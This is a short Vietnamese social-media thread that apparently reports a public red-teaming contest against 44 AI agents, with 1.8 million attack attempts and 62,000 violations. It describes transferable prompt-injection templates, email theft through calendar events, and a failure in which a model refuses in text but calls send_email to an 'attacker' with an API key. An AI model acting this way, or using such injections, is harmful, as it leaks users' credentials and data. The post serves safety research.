Chúng tôi đã triển khai 44 tác nhân AI và đề nghị internet 170.000 USD để tấn công chúng. 1,8 triệu nỗ lực, 62.000 vi phạm, bao gồm rò rỉ dữ liệu và tổn thất tài chính. 🚨 Đáng lo ngại, những lỗ hổng tương tự chuyển sang các tác nhân sản xuất trực tiếp… (ví dụ: lấy cắp email qua sự kiện lịch) 🧵
Nhiều lỗi là phổ quát và có thể chuyển nhượng. Các mẫu sao chép-dán hoạt động trên nhiều nhiệm vụ, mô hình và rào cản. Nếu nó làm hỏng một tác nhân hôm nay, có khả năng nó cũng sẽ làm hỏng của bạn.
Thất bại yêu thích: “từ chối trong văn bản, hành động trong công cụ.” 😈 Mô hình: “Tôi không thể chia sẻ thông tin xác thực.” Sau đó: send_email(to=attacker, body="API_KEY=****") Giao diện người dùng trông có vẻ an toàn; lớp công cụ gây ra thiệt hại.
489,95K